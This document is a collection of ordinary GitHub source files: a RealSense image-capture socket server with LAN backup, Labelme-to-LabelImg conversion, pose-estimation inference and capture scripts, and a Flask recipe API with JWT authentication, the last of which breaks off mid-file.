self.optimizer = optimizer
self.scaler = amp.GradScaler(enabled=cfg.amp)
self.cfg = cfg
self.model = self.set_ddp(self.model)
self.tb_writer = writer
self.logger = logger
self.evaluator = evaluator
self.test_loader = test_loader
self.losses = {}
def set_ddp(self, model):
if self.cfg.use_ddp:
return DDP(model, device_ids=[self.cfg.gpu], output_device=self.cfg.gpu)
return model
def clear_losses(self):
self.losses = {}
@abstractmethod
def train(self):
raise NotImplementedError
def sync_ema(self):
if self.ema is not None:
self.ema.update(self.model)
def save_checkpoint(self):
pass
``` |
{
"source": "a2824256/capture_server",
"score": 2
} |
#### File: a2824256/capture_server/server.py
```python
import socket
# Intel RealSense driver library
import pyrealsense2 as rs
import numpy as np
import cv2
import json
import png
import datetime
import os
import struct
import time
from socket import gethostbyname, gethostname
from threading import Lock, Thread
socket.setdefaulttimeout(10)
# Protocol constants and global state
pipeline = None
STORE_PATH = './img'
buffer = 1024
headCode = b'\xff\xff\xff\xff'
MSG_Heart = '0000'
MSG_Save = '0200'
MSG_Video_Save = '0400'
MSG_Video_Stop = '0600'
MSG_Backup = '0800'
MSG_Open_DepthCamera = '0a00'
MSG_Heart_Ack_Msg_id = b'\x01\x00'
MSG_Save_Ack_Msg_id = b'\x03\x00'
MSG_Save_Start_Ack = b'\x05\x00'
MSG_Save_Stop_Ack = b'\x07\x00'
MSG_Backup_Ack = b'\x09\x00'
MSG_Open_DepthCamera_Ack = b'\x0b\x00'
Crc_test = b'\x00'
Reserved_test = b'\x00'
capture_number = 1
status = 0
# Video capture state
global_nd_rgb = None
global_nd_depth = None
STOP_SIG = False
FIRST_TIPS = True
RECORD_STOP_SIG = False
FPS = 30.0
FILE_COUNTER = 0
CAMERA_IS_OPEN = False
BACKUP_IN_PROGRESS = False
CAPTURE_IN_PROGRESS = False
RECORD_IN_PROGRESS = False
def upload_files():
global FILE_COUNTER, BACKUP_IN_PROGRESS
BACKUP_IN_PROGRESS = True
print("备份开始\n")
try:
sk = socket.socket()
sk.connect(('172.18.6.8', 60000))
for _, dirs, _ in os.walk(STORE_PATH):
for dir in dirs:
if dir != '':
path = os.path.join(STORE_PATH, dir)
for _, _, files in os.walk(path):
for file in files:
FILE_COUNTER += 1
for _, dirs, _ in os.walk(STORE_PATH):
for dir in dirs:
if dir != '':
for _, _, files in os.walk(os.path.join(STORE_PATH, dir)):
for file in files:
send_file(sk, dir, file)
                            content = sk.recv(4)
                            try:
                                content = content.decode('utf-8')
                                if '0' in content:
                                    os.remove(os.path.join(STORE_PATH, dir, file))
                            except:
                                print("Unexpected status code in reply:", content)
                                continue
        time.sleep(1)
        content = 'Upload finished\n'
        print(content)
        FILE_COUNTER = 0
        BACKUP_IN_PROGRESS = False
except:
import traceback
traceback.print_exc()
BACKUP_IN_PROGRESS = False
def send_file(sk, file_path, filename):
    head = {'l': FILE_COUNTER,
            'filepath': file_path,
            'filename': filename,
            'filesize': None}
    file_path = os.path.join(STORE_PATH, file_path, head['filename'])
    # Compute the file size
    filesize = os.path.getsize(file_path)
    head['filesize'] = filesize
    json_head = json.dumps(head)  # serialize the dict to a JSON string
    bytes_head = json_head.encode('utf-8')  # encode the string to bytes
    # Compute the header length
    head_len = len(bytes_head)
    # Pack the int into 4 bytes with struct, so the receiver can read a
    # fixed 4-byte length prefix before the JSON header
    pack_len = struct.pack('i', head_len)
    # Send the header length first
    sk.send(pack_len)
    # Then send the JSON header bytes
    sk.send(bytes_head)
    with open(file_path, 'rb') as f:
        while filesize:
            if filesize >= buffer:
                content = f.read(buffer)  # read up to `buffer` bytes at a time
                filesize -= buffer
                sk.send(content)  # send what was read
            else:
                content = f.read(filesize)
                sk.send(content)
                filesize = 0
                break
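# A minimal receiver-side sketch (not part of the original file) matching the
# framing used by send_file above: a 4-byte struct-packed header length, then
# the JSON header, then exactly `filesize` bytes of file content.
def recv_file(sk, dest_root='.'):
    head_len = struct.unpack('i', sk.recv(4))[0]
    head = json.loads(sk.recv(head_len).decode('utf-8'))
    remaining = head['filesize']
    target = os.path.join(dest_root, head['filename'])
    with open(target, 'wb') as f:
        while remaining:
            chunk = sk.recv(min(buffer, remaining))
            if not chunk:
                break
            f.write(chunk)
            remaining -= len(chunk)
    return head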
# Create a directory if it does not exist
# path: the directory path to create
def mkdir(path):
path = path.strip()
path = path.rstrip("/")
isExists = os.path.exists(path)
if not isExists:
os.makedirs(path)
return True
else:
return False
# Left-pad a string with zeros
# str: the string to pad
# bits: the target number of characters
def fitzero(str, bits):
length = len(str)
if length < bits:
for i in range(bits - length):
str = '0' + str
return str
# Get aligned RGB and depth images
def get_aligned_images(pipeline, align):
    # Wait for a single frame set
    frames = pipeline.wait_for_frames()
    # Align the frame set
    aligned_frames = align.process(frames)
    # Get the aligned depth frame
    aligned_depth_frame = aligned_frames.get_depth_frame()
    # Get the aligned color frame
    color_frame = aligned_frames.get_color_frame()
    # Convert the depth and color frames to ndarrays
    depth_image = np.asanyarray(aligned_depth_frame.get_data())
    color_image = np.asanyarray(color_frame.get_data())
    return color_image, depth_image
def make_patient_dir(json_obj):
    # Get the patient id
    patientid = json_obj['patientId']
    # Get the case id
    caseid = json_obj['caseId']
    # Get the current timestamp
    # now = datetime.datetime.now()
    # Build the storage path for this capture session
    file_path = STORE_PATH + '/' + str(patientid) + '_' + str(caseid) + '/'
    # Create the directory
    return mkdir(file_path), file_path
# Build the response for an incoming packet
# data: the raw request packet
def get_return(data):
    global FIRST_TIPS, CAMERA_IS_OPEN
    # header length: 96 bits (12 bytes)
    # use the global status variable
    global status, global_nd_rgb, global_nd_depth
    # Extract the request header
    header = data[:12]
    # Extract the msg_id
    msg_id = header.hex()[16:20]
if str(msg_id) != '0000':
print(msg_id)
MSG_id_bytes = MSG_Heart_Ack_Msg_id
if CAMERA_IS_OPEN:
if type(global_nd_rgb) == np.ndarray:
if FIRST_TIPS:
print('camera initialization successful')
FIRST_TIPS = False
else:
status = 0
global CAPTURE_IN_PROGRESS
if msg_id == MSG_Save and CAPTURE_IN_PROGRESS is False:
CAPTURE_IN_PROGRESS = True
MSG_id_bytes = MSG_Save_Ack_Msg_id
try:
            # Extract the body
            body = data[12:]
            if len(body) > 0:
                # Parse the JSON body
                body_obj = json.loads(body)
                print("json:", body_obj)
                # Mark the camera as busy capturing
                status = 1
                res, file_path = make_patient_dir(body_obj)
                # Capture `capture_number` pairs of depth and RGB images
                for i in range(capture_number):
                    # Grab the current depth and RGB frames
                    color_image, depth_image = global_nd_rgb, global_nd_depth
                    # Create a 16-bit PNG writer
                    writer16 = png.Writer(width=depth_image.shape[1], height=depth_image.shape[0],
                                          bitdepth=16, greyscale=True)
                    print(file_path)
                    # Save the RGB image
                    cv2.imwrite(file_path + str(i) + '_rgb.jpg', color_image)
                    # Save the 16-bit depth image (PNG data, so a .png extension)
                    with open(file_path + str(i) + '_depth.png', 'wb') as f:
                        zgray2list = depth_image.tolist()
                        writer16.write(f, zgray2list)
status = 0
CAPTURE_IN_PROGRESS = False
except:
print('error')
import traceback
traceback.print_exc()
status = 0
CAPTURE_IN_PROGRESS = False
    elif msg_id == MSG_Video_Save:
        MSG_id_bytes = MSG_Save_Start_Ack
        if RECORD_IN_PROGRESS is False and CAMERA_IS_OPEN is True:
            print("Received start-recording signal")
            body = data[12:]
            if len(body) > 0:
                # Parse the JSON body
                body_obj = json.loads(body)
                print("json:", body_obj)
                # Build the storage path for this recording session
                res, file_path = make_patient_dir(body_obj)
                start_video_record(file_path)
        else:
            print("Recording already in progress or camera not started")
    elif msg_id == MSG_Video_Stop:
        if RECORD_IN_PROGRESS:
            global RECORD_STOP_SIG
            MSG_id_bytes = MSG_Save_Stop_Ack
            RECORD_STOP_SIG = True
            print("Received stop-recording signal")
        else:
            print("Not recording, nothing to stop")
    else:
        status = 4
    if msg_id == MSG_Open_DepthCamera:
        if CAMERA_IS_OPEN == False:
            thread1 = Thread(target=camera_threading)
            thread1.start()
            status = 0
            CAMERA_IS_OPEN = True
        else:
            print("Camera already started")
    if msg_id == MSG_Backup:
        if BACKUP_IN_PROGRESS is False and RECORD_IN_PROGRESS is False:
            MSG_id_bytes = MSG_Backup_Ack
            thread_backup = Thread(target=upload_files)
            thread_backup.start()
        else:
            print("Backup already in progress")
    # Build the response JSON object
    json_obj = {}
    # The returned status mirrors the current global status
    json_obj['status'] = status
    # Serialize the JSON object to a string
    json_str = json.dumps(json_obj)
    # Compute the total packet length
    total_len = len(bytes(json_str, encoding='utf-8')) + 12
    length_bytes = struct.pack("<i", total_len)
    # Assemble the response bytes
    content = headCode + length_bytes + MSG_id_bytes + Crc_test + Reserved_test + bytes(json_str, encoding='utf-8')
    return content
def write_start_log():
file_path = "./log"
file = open(file_path, 'w')
# 获取当前时间戳
now = datetime.datetime.now()
# 格式化时间戳
otherStyleTime = now.strftime("%Y-%m-%d %H:%M:%S")
file.write(otherStyleTime)
file.close()
def start_video_record(path):
thread = Thread(target=video_record_threading, args=(path,))
thread.start()
def video_record_threading(path):
global RECORD_STOP_SIG, RECORD_IN_PROGRESS
RECORD_IN_PROGRESS = True
fourcc = cv2.VideoWriter_fourcc(*'XVID')
t = time.time()
out = cv2.VideoWriter(os.path.join(path, str(t) + '.avi'), fourcc, 30, (640, 480))
    try:
        ts = datetime.datetime.now()
        while True:
            if RECORD_STOP_SIG:
                break
            te = datetime.datetime.now()
            sec = te - ts
            if int(sec.seconds) > 300:
                print(sec.seconds)
                print("Five-minute limit reached, stopping recording")
                break
            out.write(global_nd_rgb)
            # time.sleep(0.01)
        out.release()
        print("RECORD_STOP_SIG:", RECORD_STOP_SIG)
        print("RECORD_IN_PROGRESS:", RECORD_IN_PROGRESS)
        RECORD_STOP_SIG = False
        RECORD_IN_PROGRESS = False
        print("Recording finished")
    except:
        import traceback
        traceback.print_exc()
        out.release()
        RECORD_STOP_SIG = False
        RECORD_IN_PROGRESS = False
        print("Recording ended with an error")
def camera_threading():
    print('sub-thread start')
    global global_nd_rgb, global_nd_depth, pipeline
    try:
        # Create the pipeline
        pipeline = rs.pipeline()
        # Get the config object
        config = rs.config()
        # Enable the depth stream
        config.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 60)
        # Enable the RGB stream
        config.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 60)
        # Start the pipeline
        profile = pipeline.start(config)
        # Align to the color stream
        align_to = rs.stream.color
        # Create the align object
        align = rs.align(align_to)
        while True:
            if STOP_SIG:
                pipeline.stop()
                print('thread exit')
                break
            global_nd_rgb, global_nd_depth = get_aligned_images(pipeline, align)
    except:
        pipeline.stop()
        print("camera connect fail")
        exit()
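# A minimal client-side sketch (not part of the original file): builds the
# heartbeat packet this server expects -- headCode, a little-endian total
# length, msg_id 0x0000, the CRC and reserved bytes, then the JSON body.
def example_heartbeat_packet(body_obj=None):
    body = json.dumps(body_obj or {}).encode('utf-8')
    msg_id = b'\x00\x00'
    total_len = struct.pack('<i', len(body) + 12)
    return headCode + total_len + msg_id + Crc_test + Reserved_test + body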
# Main entry point
if __name__ == '__main__':
    # write_start_log()
    # Socket setup
    s = socket.socket()
    # -------------- local test --------------
    # host = '127.0.0.1'
    # -------------- local test --------------
    # LAN IP of this machine
    host = "172.18.6.6"
print('host:', host)
port = 60000
s.bind((host, port))
s.listen(5)
print('start')
while True:
try:
c, addr = s.accept()
print(addr, " connected")
counter = 0
while True:
try:
                    all_data = c.recv(12)
                    if len(all_data) > 0:
                        # Wrap the packet in a bytearray
                        rec_data = bytearray(all_data)
                        # print(rec_data)
                        # Find the headCode marker
                        head_index = all_data.find(b'\xff\xff\xff\xff')
                        # headCode at position 0 marks the start of a packet
                        if head_index == 0:
                            # Bytes received so far
                            curSize = len(all_data)
                            # Total packet length from the Length field
                            allLen = int.from_bytes(rec_data[head_index + 4:head_index + 8], byteorder='little')
                            # Keep reading until the whole packet has arrived
                            while curSize < allLen:
                                # Read more data
                                data = c.recv(1024)
                                # Append it to the current packet
                                all_data += data
                                # Update the received size
                                curSize += len(data)
                            content = get_return(all_data)
                            # print(content)
                            # Send the response back
                            c.send(content)
except Exception as e:
# print("error-2l", e)
c.close()
print(addr, " disconnected")
break
except Exception as e:
# print("error-1l", e)
continue
STOP_SIG = True
s.close()
if pipeline is not None:
pipeline.stop()
``` |
{
"source": "a2824256/Labelme-dataset-extension-script",
"score": 3
} |
#### File: a2824256/Labelme-dataset-extension-script/labelme_2_labelimg.py
```python
import os
import glob
import json
import xml.dom.minidom
from xml.dom import minidom
path = "F:\\0903modeldata\\labels\\"
img_list = glob.glob(path + "*.json")
width = 0
height = 0
# Fill in the current folder manually if the split image path has only one element
folder = ""
def get_annotation(labels):
res = []
for i in range(len(labels)):
bndbox = get_bndbox(labels[i]['points'])
res.append([labels[i]['label'], bndbox])
return res
def get_bndbox(points):
    global width, height
    xmin = width
    ymin = height
    xmax = 0
    ymax = 0
    for x, y in points:
        if x > xmax:
            xmax = int(x)
        if x < xmin:
            xmin = int(x)
        if y > ymax:
            ymax = int(y)
        if y < ymin:
            ymin = int(y)
    return [xmin, ymin, xmax, ymax]
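# Example with hypothetical points: get_bndbox([[10, 20], [30, 5], [25, 40]])
# returns [10, 5, 30, 40] (given an image at least that large).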
for i in range(len(img_list)):
json_path = img_list[i]
is_exists = os.path.exists(json_path)
if is_exists:
        # Open the JSON file
        f = open(json_path, encoding='utf-8')
        # Load the JSON content
content = json.load(f)
width = content['imageWidth']
height = content['imageHeight']
labels = content['shapes']
labels = get_annotation(labels)
image_path = content['imagePath']
path_array = image_path.split('\\')
length = len(path_array)
if length < 1:
continue
elif length > 1:
folder = path_array[0]
impl = minidom.getDOMImplementation()
        # Create the root node
dom = impl.createDocument(None, 'annotation', None)
root = dom.documentElement
# folder
nameE = dom.createElement('folder')
nameT = dom.createTextNode(folder)
nameE.appendChild(nameT)
root.appendChild(nameE)
# filename
nameE = dom.createElement('filename')
nameT = dom.createTextNode(path_array[len(path_array)-1])
nameE.appendChild(nameT)
root.appendChild(nameE)
# path
nameE = dom.createElement('path')
nameT = dom.createTextNode(image_path)
nameE.appendChild(nameT)
root.appendChild(nameE)
# source
nameE = dom.createElement('source')
# sub - database
nameE_sub = dom.createElement('database')
nameT_sub = dom.createTextNode("Unknown")
nameE_sub.appendChild(nameT_sub)
nameE.appendChild(nameE_sub)
root.appendChild(nameE)
# size
nameE = dom.createElement('size')
# sub - width
nameE_sub = dom.createElement('width')
nameT_sub = dom.createTextNode(str(width))
nameE_sub.appendChild(nameT_sub)
nameE.appendChild(nameE_sub)
root.appendChild(nameE)
# sub - height
nameE_sub = dom.createElement('height')
nameT_sub = dom.createTextNode(str(height))
nameE_sub.appendChild(nameT_sub)
nameE.appendChild(nameE_sub)
root.appendChild(nameE)
# sub - depth
nameE_sub = dom.createElement('depth')
nameT_sub = dom.createTextNode('3')
nameE_sub.appendChild(nameT_sub)
nameE.appendChild(nameE_sub)
root.appendChild(nameE)
# segmented
nameE = dom.createElement('segmented')
nameT = dom.createTextNode('0')
nameE.appendChild(nameT)
root.appendChild(nameE)
# object - iterator
for obj_i in labels:
# object
nameE = dom.createElement('object')
# sub - name
nameE_sub = dom.createElement('name')
nameT_sub = dom.createTextNode(obj_i[0])
nameE_sub.appendChild(nameT_sub)
nameE.appendChild(nameE_sub)
# sub - pose
nameE_sub = dom.createElement('pose')
nameT_sub = dom.createTextNode('Unspecified')
nameE_sub.appendChild(nameT_sub)
nameE.appendChild(nameE_sub)
# sub - truncated
nameE_sub = dom.createElement('truncated')
nameT_sub = dom.createTextNode('0')
nameE_sub.appendChild(nameT_sub)
nameE.appendChild(nameE_sub)
# sub - difficult
nameE_sub = dom.createElement('difficult')
nameT_sub = dom.createTextNode('0')
nameE_sub.appendChild(nameT_sub)
nameE.appendChild(nameE_sub)
# sub - bndbox
nameE_sub = dom.createElement('bndbox')
# sub2 - xmin
nameE_sub2 = dom.createElement('xmin')
nameT_sub2 = dom.createTextNode(str(obj_i[1][0]))
nameE_sub2.appendChild(nameT_sub2)
nameE_sub.appendChild(nameE_sub2)
# sub2 - ymin
nameE_sub2 = dom.createElement('ymin')
nameT_sub2 = dom.createTextNode(str(obj_i[1][1]))
nameE_sub2.appendChild(nameT_sub2)
nameE_sub.appendChild(nameE_sub2)
# sub2 - xmax
nameE_sub2 = dom.createElement('xmax')
nameT_sub2 = dom.createTextNode(str(obj_i[1][2]))
nameE_sub2.appendChild(nameT_sub2)
nameE_sub.appendChild(nameE_sub2)
# sub2 - ymax
nameE_sub2 = dom.createElement('ymax')
nameT_sub2 = dom.createTextNode(str(obj_i[1][3]))
nameE_sub2.appendChild(nameT_sub2)
nameE_sub.appendChild(nameE_sub2)
nameE.appendChild(nameE_sub)
root.appendChild(nameE)
new_file = path_array[len(path_array)-1].replace('jpg', 'xml')
new_file = "F:\\0903modeldata\\xml\\" + new_file
f = open(new_file, 'w')
dom.writexml(f, addindent=' ', newl='\n', encoding='utf-8')
f.close()
        print(new_file + ' - generated')
    else:
        print(json_path + " - no such file")
``` |
{
"source": "a2824256/pyrealsense_collection",
"score": 3
} |
#### File: a2824256/pyrealsense_collection/main.py
```python
import png
import pyrealsense2 as rs
import logging
logging.basicConfig(level=logging.INFO)
import numpy as np
import cv2
import os
def make_directories():
if not os.path.exists("JPEGImages/"):
os.makedirs("JPEGImages/")
if not os.path.exists("depth/"):
os.makedirs("depth/")
if not os.path.exists("8bit_depth/"):
os.makedirs("8bit_depth/")
if __name__ == "__main__":
make_directories()
pipeline = rs.pipeline()
config = rs.config()
config.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30)
config.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 30)
profile = pipeline.start(config)
frames = pipeline.wait_for_frames()
color_frame = frames.get_color_frame()
intr = color_frame.profile.as_video_stream_profile().intrinsics
align_to = rs.stream.color
align = rs.align(align_to)
number = 0
while True:
filecad = "JPEGImages/%s.jpg" % number
filedepth = "depth/%s.png" % number
filedepth_8b = "8bit_depth/%s.png" % number
frames = pipeline.wait_for_frames()
aligned_frames = align.process(frames)
aligned_depth_frame = aligned_frames.get_depth_frame()
color_frame = aligned_frames.get_color_frame()
if not aligned_depth_frame or not color_frame:
continue
        d = np.asanyarray(aligned_depth_frame.get_data())
        # Compress the 16-bit depth map into 8 bits for preview
        d8 = cv2.convertScaleAbs(d, alpha=0.3)
        # Pixels with no depth reading come back as 0; push them to white
        pos = np.where(d8 == 0)
        d8[pos] = 255
        c = np.asanyarray(color_frame.get_data())
cv2.imshow('COLOR IMAGE', c)
        # Press 'q' to save the current RGB/depth pair
        if cv2.waitKey(1) & 0xFF == ord('q'):
cv2.imwrite(filecad, c)
writer16 = png.Writer(width=d.shape[1], height=d.shape[0],
bitdepth=16, greyscale=True)
writer8 = png.Writer(width=d.shape[1], height=d.shape[0],
bitdepth=8, greyscale=True)
with open(filedepth, 'wb') as f:
zgray2list = d.tolist()
writer16.write(f, zgray2list)
with open(filedepth_8b, 'wb') as f2:
zgray2list_b8 = d8.tolist()
writer8.write(f2, zgray2list_b8)
number += 1
cv2.destroyAllWindows()
``` |
{
"source": "a2824256/singleshotpose_imp",
"score": 2
} |
#### File: a2824256/singleshotpose_imp/realtime.py
```python
from torchvision import datasets, transforms
# from torch.utils.data import Dataset, DataLoader
import scipy.io
import warnings
# from PIL import Image
# import trimesh
# import cv2
import wx
# from pynput import keyboard
warnings.filterwarnings("ignore")
import matplotlib.pyplot as plt
import scipy.misc
from darknet import Darknet
# import dataset
from utils import *
# from MeshPly import MeshPly
# import png
import pyrealsense2 as rs
# import json
import logging
logging.basicConfig(level=logging.INFO)
import numpy as np
import cv2
import time
import os
def valid(datacfg, modelcfg, weightfile):
    # Internal helper: count the valid ground-truth entries
def truths_length(truths, max_num_gt=50):
for i in range(max_num_gt):
if truths[i][1] == 0:
return i
# Parse configuration files
data_options = read_data_cfg(datacfg)
    # Backup folder for weights
    backupdir = data_options['backup']
    # Which GPU(s) to use
    gpus = data_options['gpus']
    # Image dimensions
    im_width = int(data_options['width'])
    im_height = int(data_options['height'])
    # Make sure the backup folder exists
    if not os.path.exists(backupdir):
        makedirs(backupdir)
# ---------------real time detection start---------------
pipeline = rs.pipeline()
config = rs.config()
config.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30)
config.enable_stream(rs.stream.color, 640, 480, rs.format.rgb8, 30)
pipeline.start(config)
# profile = pipeline.start(config)
pipeline.wait_for_frames()
# frames = pipeline.wait_for_frames()
# color_frame = frames.get_color_frame()
# intr = color_frame.profile.as_video_stream_profile().intrinsics
# camera_parameters = {'fx': intr.fx, 'fy': intr.fy,
# 'ppx': intr.ppx, 'ppy': intr.ppy,
# 'height': intr.height, 'width': intr.width,
# 'depth_scale': profile.get_device().first_depth_sensor().get_depth_scale()
# }
align_to = rs.stream.color
align = rs.align(align_to)
# ---------------real time detection end---------------
# Parameters
seed = int(time.time())
os.environ['CUDA_VISIBLE_DEVICES'] = gpus
    # Random seed
    torch.cuda.manual_seed(seed)
    # Whether to visualize the prediction
    visualize = True
    # Number of classes
    num_classes = 1
    # Corner pairs: each pair of cuboid corners is joined with a line segment when drawing
    edges_corners = [[1, 5], [2, 6], [3, 7], [4, 8], [1, 2], [1, 3], [2, 4], [3, 4], [5, 6], [5, 7], [6, 8], [7, 8]]
preds_corners2D = []
    # Initialize the network
    model = Darknet(modelcfg)
    # Print the network structure
    # model.print_network()
    # Load the weights
    model.load_weights(weightfile)
    # Use CUDA
    model.cuda()
    model.eval()
    num_keypoints = model.num_keypoints
    # number of labels = 2 * keypoints + 3
    # num_labels = num_keypoints * 2 + 3
frames = pipeline.wait_for_frames()
aligned_frames = align.process(frames)
aligned_depth_frame = aligned_frames.get_depth_frame()
color_frame = aligned_frames.get_color_frame()
if not aligned_depth_frame or not color_frame:
exit()
# d = np.asanyarray(aligned_depth_frame.get_data())
c = np.asanyarray(color_frame.get_data())
# cv2.imwrite('test.png', c)
if cv2.waitKey(1) & 0xFF == ord('q'):
pipeline.stop()
# ------------------take picture end------------------
    # ----------------------- single image: start -----------------------
    # Image preprocessing
    transform = transforms.Compose([transforms.ToTensor(), ])
    pic_tensor = transform(c)
    # exit()
    # Add a batch dimension to match the tensor shape the original algorithm expects
    pic_tensor = pic_tensor[np.newaxis, :]
    # Label preprocessing
    # default from the original algorithm
    # num_keypoints = 9
    # default from the original algorithm
    # max_num_gt = 50
    # default from the original algorithm
    # num_labels = 2 * num_keypoints + 3  # +2 for ground-truth of width/height , +1 for class label
    # label = torch.zeros(max_num_gt * num_labels)
    # tmp = torch.from_numpy(read_truths_args(labelfile))
    # tmp = tmp.view(-1)
    # tsz = tmp.numel()
    # if tsz > max_num_gt * num_labels:
    #     label = tmp[0:max_num_gt * num_labels]
    # elif tsz > 0:
    #     label[0:tsz] = tmp
    # ----------------------- single image: end -----------------------
# target = label
data = pic_tensor
# Images
img = data[0, :, :, :]
img = img.numpy().squeeze()
img = np.transpose(img, (1, 2, 0))
# Pass data to GPU
data = data.cuda()
# target = target.cuda()
# Wrap tensors in Variable class, set volatile=True for inference mode and to use minimal memory during inference
with torch.no_grad():
data = Variable(data)
# Forward pass
output = model(data).data
all_boxes = get_region_boxes(output, num_classes, num_keypoints)
corners2D_pr = np.array(np.reshape(all_boxes[:18], [9, 2]), dtype='float32')
corners2D_pr[:, 0] = corners2D_pr[:, 0] * im_width
corners2D_pr[:, 1] = corners2D_pr[:, 1] * im_height
preds_corners2D.append(corners2D_pr)
    # Visualization
if visualize:
# Visualize
plt.xlim((0, im_width))
plt.ylim((0, im_height))
plt.imshow(scipy.misc.imresize(img, (im_height, im_width)))
# Projections
for edge in edges_corners:
plt.plot(corners2D_pr[edge, 0], corners2D_pr[edge, 1], color='b', linewidth=3.0)
plt.gca().invert_yaxis()
plt.show()
datacfg = 'cfg/duck.data'
modelcfg = 'cfg/yolo-pose.cfg'
weightfile = 'backup/duck/model_backup.weights'
valid(datacfg, modelcfg, weightfile)
``` |
{
"source": "a283910020/yummy-rest",
"score": 3
} |
#### File: app/endpoints/auth.py
```python
from datetime import datetime, timedelta
from werkzeug.security import check_password_hash, generate_password_hash
from flask import jsonify, request, make_response
from flask_restplus import Resource
from flask_jwt import jwt
from app import APP
from app.helpers import decode_access_token
from app.helpers.validators import UserSchema
from app.restplus import API
from app.models import db, User, BlacklistToken
from app.serializers import add_user, login_user, password_reset
# Linting exceptions
# pylint: disable=C0103
# pylint: disable=W0702
# pylint: disable=W0703
# pylint: disable=E1101
# pylint: disable=R0201
auth_ns = API.namespace('auth', description="Authentication/Authorization operations.")
@auth_ns.route('/register')
class RegisterHandler(Resource):
"""
This class handles user account creation.
"""
@API.expect(add_user)
def post(self):
"""
Registers a new user account.
"""
data = request.get_json()
# Instanciate user schema
user_schema = UserSchema()
data, errors = user_schema.load(data)
if errors:
response_obj = dict(
errors=errors
)
return make_response(jsonify(response_obj), 422)
# Check if user exists
email = data['email'].lower()
user = User.query.filter_by(email=email).first()
if not user:
try:
new_user = User(
email=data['email'], username=data['username'], password=data['password']
)
db.session.add(new_user)
db.session.commit()
return make_response(jsonify({'message': 'Registered successfully!'}), 201)
except:
response = {"message": "Username already taken, please choose another."}
return make_response(jsonify(response), 401)
else:
response = jsonify({'message': 'User already exists. Please Log in instead.'})
return make_response(response, 400)
@auth_ns.route('/login')
class LoginHandler(Resource):
"""
This class handles user login
"""
@API.expect(login_user)
def post(self):
"""
User Login/SignIn route
"""
login_info = request.get_json()
if not login_info:
return make_response(jsonify({'message': 'Input payload validation failed'}), 400)
try:
user = User.query.filter_by(email=login_info['email']).first()
if not user:
return make_response(jsonify({"message": 'User does not exist!'}), 404)
if check_password_hash(user.password, login_info['password']):
payload = {
'exp': datetime.utcnow() + timedelta(weeks=3),
'iat': datetime.utcnow(),
'sub': user.public_id
}
token = jwt.encode(
payload,
APP.config['SECRET_KEY'],
algorithm='HS256'
)
return jsonify({"message": "Logged in successfully.",
"access_token": token.decode('UTF-8'),
"username": user.username
})
return make_response(jsonify({"message": "Incorrect credentials."}), 401)
except Exception as e:
print(e)
return make_response(jsonify({"message": "An error occurred. Please try again."}), 501)
@auth_ns.route('/logout')
class LogoutHandler(Resource):
"""
This class handles user logout
"""
def post(self):
"""
Logout route
"""
access_token = request.headers.get('Authorization')
if access_token:
result = decode_access_token(access_token)
if not isinstance(result, str):
# mark the token as blacklisted
blacklisted_token = BlacklistToken(access_token)
try:
# insert the token
db.session.add(blacklisted_token)
db.session.commit()
response_obj = dict(
status="success",
message="Logged out successfully."
)
return make_response(jsonify(response_obj), 200)
except Exception as e:
resp_obj = {
'status': 'fail',
'message': e
}
return make_response(jsonify(resp_obj), 200)
else:
resp_obj = dict(
status="fail",
message=result
)
return make_response(jsonify(resp_obj), 401)
else:
response_obj = {
'status': 'fail',
'message': 'Provide a valid auth token.'
}
return make_response(jsonify(response_obj), 403)
@auth_ns.route('/reset-password')
class PasswordResetResource(Resource):
"""
This class handles the user password reset request
"""
@API.expect(password_reset)
def post(self):
"""
Reset user password
"""
# Request data
data = request.get_json()
# Get specified user
user = User.query.filter_by(public_id=data['public_id']).first()
if user:
if check_password_hash(user.password, data['current_password']):
                user.password = generate_password_hash(data['new_password'])
db.session.commit()
resp_obj = dict(
status="Success!",
message="Password reset successfully!"
)
resp_obj = jsonify(resp_obj)
return make_response(resp_obj, 200)
resp_obj = dict(
status="Fail!",
message="Wrong current password. Try again."
)
resp_obj = jsonify(resp_obj)
return make_response(resp_obj, 401)
resp_obj = dict(
status="Fail!",
message="User doesn't exist, check the Public ID provided!"
)
resp_obj = jsonify(resp_obj)
return make_response(resp_obj, 403)
```
#### File: app/endpoints/recipes.py
```python
from flask import request, jsonify, make_response
from flask_restplus import Resource
from webargs.flaskparser import parser
from app.models import db, Recipe
from app.serializers import recipe
from app.restplus import API
from app.helpers import (
authorization_required, _clean_name, _pagination, is_unauthorized,
make_payload
)
from app.helpers.validators import RecipeSchema
from app.parsers import SEARCH_PAGE_ARGS, make_args_parser
# Linting exceptions
# pylint: disable=C0103
# pylint: disable=E0213
# pylint: disable=E1101
# pylint: disable=W0613
recipes_ns = API.namespace(
'recipes', description='The enpoints for recipe manipulation',
path='/category/<int:category_id>/recipes'
)
args_parser = make_args_parser(recipes_ns)
def _does_not_exist():
"""Returns recipe does not exist message"""
response_payload = dict(
message="Recipe does not exist!"
)
response_payload = jsonify(response_payload)
return make_response(response_payload, 404)
@recipes_ns.route('')
class GeneralRecipesHandler(Resource):
"""
This class defines the endpoints for creating a single recipe
in a particular category or retrieving all the recipes in said
category
"""
@authorization_required
@API.expect(recipe)
def post(current_user, self, category_id):
"""
Create a recipe in the specified category
:param int category_id: The id of the category to which recipe should be added
"""
if not current_user:
return is_unauthorized()
request_payload = request.get_json()
request_payload['name'] = _clean_name(request_payload['name'])
# initialize schema object for input validation
recipe_schema = RecipeSchema()
# Validate input
request_payload, errors = recipe_schema.load(request_payload)
# Raise input validation error notification
if errors:
response_payload = dict(
message="You provided some invalid details.",
errors=errors
)
return make_response(jsonify(response_payload), 422)
category = current_user.categories.filter_by(id=category_id).first()
if category:
new_recipe = Recipe(
name=request_payload['name'],
category_id=category_id,
user_id=current_user.id,
ingredients=request_payload['ingredients'],
description=request_payload['description']
)
existing_recipe = category.recipes.filter_by(
name=request_payload['name']
).first()
if not existing_recipe:
db.session.add(new_recipe)
db.session.commit()
response_payload = {
'recipes': [make_payload(recipe=new_recipe)]
}
response_payload = jsonify(response_payload)
return make_response(response_payload, 201)
response_payload = dict(
message='Recipe already exists!'
)
response_payload = jsonify(response_payload)
return make_response(response_payload, 400)
response_payload = dict(
message='Invalid category!'
)
response_payload = jsonify(response_payload)
return make_response(response_payload, 400)
@authorization_required
@recipes_ns.expect(args_parser)
def get(current_user, self, category_id):
"""
